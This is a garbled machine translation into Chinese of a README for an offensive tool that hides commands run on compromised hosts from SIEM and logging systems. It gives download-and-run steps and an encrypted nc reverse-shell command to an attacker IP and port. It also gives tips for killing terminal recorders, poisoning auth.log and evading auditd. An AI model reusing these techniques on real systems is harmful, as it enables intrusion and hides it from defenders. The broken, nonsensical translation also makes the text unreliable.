.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
shell命令混淆以避免SIEM/检测系统
在五旬节期间,一个重要方面是隐身。因此,您应该在通过后清除轨道。然而,许多基础架构日志命令并将其发送到SIEM,使其实时使之后单独清洁部分无用。Volana提供了一种简单的方法来隐藏在折衷的机器上执行的命令(通过提供self shell运行时)(输入您的命令,Volana为您执行您的命令)。像这样,您在通过期间清除了曲目
用法
您需要获得交互式外壳。 (找到一种产生它的方法,您是黑客,这是您的工作!否则)。然后在目标机器上下载并启动它。就是这样,现在您可以键入要执行的命令
##从github发行
##如果您没有折衷的机器访问Internet,请找到另一种方式
curl -lo -l -l https://github.com/ariary/volana/releases/latest/download/volana
##执行它
./volana
##您现在处于雷达之下
Volana»Echo'Hi Siem团队!你找到我吗? /dev/null 21#您可以有点自大
volana»[命令] Volana Console: * RING:启用戒指模式即启动每个命令的关键字。
来自非交互式壳
想象一下您有一个非交互式外壳(Webshell或Blind RCE),您可以使用加密和解密子命令。以前,您需要使用嵌入式加密密钥构建Volana。
在攻击者机器上##用加密密钥构建Volana
制造构建。加入
##将其转移到目标(唯一可检测的命令)上
## [.]
##加密您要隐身执行的命令
##(这里是NC绑定以获得交互式外壳)
volana encr'nc [Attacker_ip] [Attacker_port] -e /bin /bash'
加密命令复制加密命令并使用您的RCE在目标机上执行。
##现在您有了一个绑定,生成它以使其具有互动性,并且通常使用Volana为隐形(./volana)。 +不要忘记在离开之前删除Volana二进制文件(原因是解密密钥可以很容易地从中检索)为什么不只是用echo [命令]隐藏命令| base64?并用echo [encoded_command]在目标上解码| base64 -d | bash
因为我们希望受到保护,免受触发基本64使用警报或寻求命令中的base64文本的系统。我们也希望使调查变得困难,而Base64并不是真正的刹车。
检测
请记住,Volana并不是一个使您完全看不见的奇迹。其目的是使入侵检测和调查更加努力。
通过检测,我们的意思是,如果执行某个命令,我们是否能够触发警报。
隐藏
只会捕获Volana发射命令线。 🧠但是,通过在执行它之前添加一个空间,默认的bash行为是不保存它
Detection systems that are based on history command output Detection systems that are based on history files .bash_history, '.zsh_history' etc . Detection systems that are based on bash debug traps Detection systems that are based on sudo built-in logging system Detection systems tracing all processes syscall system-wide (eg opensnoop) Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec,等等。)易于检测的避免3: pkill -9脚本不是常见的案例屏幕更难避免,但是它不会注册输入(秘密输入: stty -echo=避免避免)命令检测可以避免使用加密的VOLANA检测:01
可见
检测系统,该检测系统无法避免使用
Bug Bounty
的检测系统。 Not a common case Detection systems that are based on syslog files (e.g. /var/log/auth.log) Only for sudo or su commands syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info 'No hacker is povertyening your syslog solution, don't worry') Detection systems that are based on SYSCALL(例如AUDITD,LKML/EBPF)难以分析,可以通过使几种多样性SYSCALLS自定义LD_Preload注射以使Log并不是所有常见的情况3
信用
对您的010-1010的遗憾,但对于ClickBait标题而言,但不会为Contibutors提供任何钱,可以使LOG并不是一个常见的情况。
让我知道您是否找到了: *检测Volana *的一种方法,一种无法检测Volana命令*的间谍控制台*一种避免检测系统的方法
在这里报告
010-1010在控制台moonwalk:间谍的8种方法